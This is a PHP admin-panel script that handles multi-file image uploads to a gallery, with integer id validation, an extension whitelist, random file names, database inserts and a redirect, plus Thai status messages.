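<?php
// Output buffering must start before header.php prints anything: the upload
// handler further down echoes status text and then issues header("location:..."),
// which only works while the output is still buffered.
ob_start();
// Short open tags ("<?") were replaced by "<?php" so this file no longer
// depends on the short_open_tag ini setting.
include 'check_mode_admin.php';
//include '../../dbconnect.php';
//include 'header.php';
include 'dbconnect.php';
include 'header.php';
?>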
<?php
if (check_mode_admin_session(1,1)) {
?>
<?php
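/**
 * Build a random string drawn from [0-9a-z].
 *
 * The result is used below as the on-disk name of an uploaded image, so the
 * generator should not be predictable: random_int() is used when the runtime
 * provides it (PHP 7+); older runtimes fall back to mt_rand(), which is not
 * cryptographically secure but is the best option available without a polyfill.
 *
 * @param int $length Number of characters to generate; 0 or a negative value yields ''.
 * @return string
 */
function GenerateRandomString($length = 10) {
    $characters = '0123456789abcdefghijklmnopqrstuvwxyz';
    $maxIndex = strlen($characters) - 1;
    // Cast once so a non-numeric argument cannot turn the loop bound into a
    // string comparison.
    $length = (int)$length;
    $haveCsprng = function_exists('random_int');
    $randomString = '';
    for ($i = 0; $i < $length; $i++) {
        $index = $haveCsprng ? random_int(0, $maxIndex) : mt_rand(0, $maxIndex);
        $randomString .= $characters[$index];
    }
    return $randomString;
}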

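// Upload handler: stores the posted images under image_gallery/<gallery_id>/
// with a random file name, records each one in gallery_image with the next
// free image_order, then redirects to the last page of gallery_detail.php.
if (!empty($_POST["submit"]))
{
	// gallery_id is spliced into SQL *and* used as a directory name under
	// image_gallery/, so it must be a plain integer: this rejects SQL fragments
	// and "../" path segments alike. A non-integer id is treated as "not found".
	$gallery_id = isset($_POST["id"]) ? filter_var($_POST["id"], FILTER_VALIDATE_INT) : false;
	$result = false;
	if ($gallery_id !== false)
	{
		$gallery_id = (int)$gallery_id;
		$gallery_image_path = "../../image_gallery/" . $gallery_id . "/";
		$sql = "SELECT * FROM gallery WHERE gallery_id=" . $gallery_id;
		$query = mysqli_query($conn, $sql);
		$result = $query ? mysqli_fetch_array($query, MYSQLI_ASSOC) : false;
	}

	if ($result)
	{
		// The form posts filUpload[] (multiple files), so tmp_name is an array;
		// a single non-array value would make the foreach below fail.
		if (isset($_FILES["filUpload"]) && is_array($_FILES["filUpload"]["tmp_name"]))
		{
			$image_folder = "../../image_gallery/" . $gallery_id;
			if (!file_exists($image_folder))
			{
				mkdir($image_folder, 0755);
			}

			// Next free image_order: one past the current highest, or 1 for an empty gallery.
			$sql = "SELECT * FROM gallery_image";
			$sql .= " WHERE ( (gallery_id=" . $gallery_id . ")";
			$sql .= " AND (image_order IS NOT NULL) )";
			$sql .= " ORDER BY image_order DESC";
			$query = mysqli_query($conn, $sql);
			$order_row = $query ? mysqli_fetch_array($query, MYSQLI_ASSOC) : false;
			$current_image_order = $order_row ? $order_row["image_order"] + 1 : 1;

			foreach ($_FILES['filUpload']['tmp_name'] as $key => $file_tmp)
			{
				$file_name = $_FILES['filUpload']['name'][$key];
				$upload_error = isset($_FILES['filUpload']['error'][$key])
					? $_FILES['filUpload']['error'][$key]
					: UPLOAD_ERR_OK;
				// Skip empty or failed upload slots instead of trying to move them.
				if ($upload_error !== UPLOAD_ERR_OK)
				{
					continue;
				}

				$extension = pathinfo($file_name, PATHINFO_EXTENSION);
				$lower_extension = strtolower($extension);
				// Extension whitelist; the stored name keeps the original extension case.
				if (!in_array($lower_extension, array('jpg', 'jpeg', 'png'), true))
				{
					continue;
				}

				$random_string = GenerateRandomString(mt_rand(10, 20));
				$u_image_path = "img" . $random_string . "." . $extension;

				// Only record a row once the file is actually on disk, so the
				// table never references an image that was not saved.
				if (!move_uploaded_file($file_tmp, $gallery_image_path . $u_image_path))
				{
					continue;
				}

				// Add to the database. $u_image_path is generated above from a
				// fixed alphabet, but escaping keeps the statement safe regardless.
				$sql2 = "INSERT INTO gallery_image ";
				$sql2 .= "(gallery_id,image_file,image_order) ";
				$sql2 .= "VALUES ";
				$sql2 .= "(" . $gallery_id . ",'" . mysqli_real_escape_string($conn, $u_image_path) . "'," . $current_image_order . ") ";
				if (mysqli_query($conn, $sql2))
				{
					echo "เพิ่มในฐานข้อมูลแล้ว";
				}
				else
				{
					echo "ไม่สามารถเพิ่มในฐานข้อมูลได้";
				}
				$current_image_order = $current_image_order + 1;
			}
		}

		// Count the gallery's images to find the last listing page.
		$sql = "SELECT * from gallery_image";
		$sql .= " WHERE gallery_id=" . $gallery_id;
		$sql .= " ORDER BY image_order ASC";
		$query = mysqli_query($conn, $sql);
		$num_rows = $query ? mysqli_num_rows($query) : 0;

		$per_page = 20;   // Per Page
		// Last page number, never below 1 (an empty gallery still has page 1).
		$num_pages = max(1, (int)ceil($num_rows / $per_page));

		// The echo calls above are held in the output buffer started at the top
		// of this file, so the redirect header can still be sent here.
		$redirect_url = "gallery_detail.php?id=" . $gallery_id . "&Page=" . $num_pages;
		header("location:$redirect_url");
	}
	else // no gallery row for this id
	{
		echo "ไม่พบข้อมูล";
	}
}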
?>
<?php
} //if(check_mode_admin_session(1,1)) {
?>
<?php /* The footer is included for every request, outside the admin gate that closes just above. */ include 'footer.php';?>
